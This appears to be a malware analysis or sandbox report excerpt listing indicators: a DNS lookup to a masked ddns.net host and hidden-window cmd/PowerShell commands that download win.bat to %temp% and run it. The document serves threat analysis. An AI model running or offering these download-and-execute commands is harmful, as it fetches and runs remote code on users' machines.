Technical Information
- http://ve####che.ddns.net/win.bat as %temp%\win.bat
- 've####che.ddns.net':80
- DNS ASK ve####che.ddns.net
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -Command (new-object System.Net.WebClient).DownloadFile('http://ve####che.ddns.net/win.bat','%TEMP%\win.bat')' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "%temp%\win.bat"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -Command (new-object System.Net.WebClient).DownloadFile('http://ve####che.ddns.net/win.bat','%TEMP%\win.bat')
- '%WINDIR%\syswow64\cmd.exe' /c "%temp%\win.bat"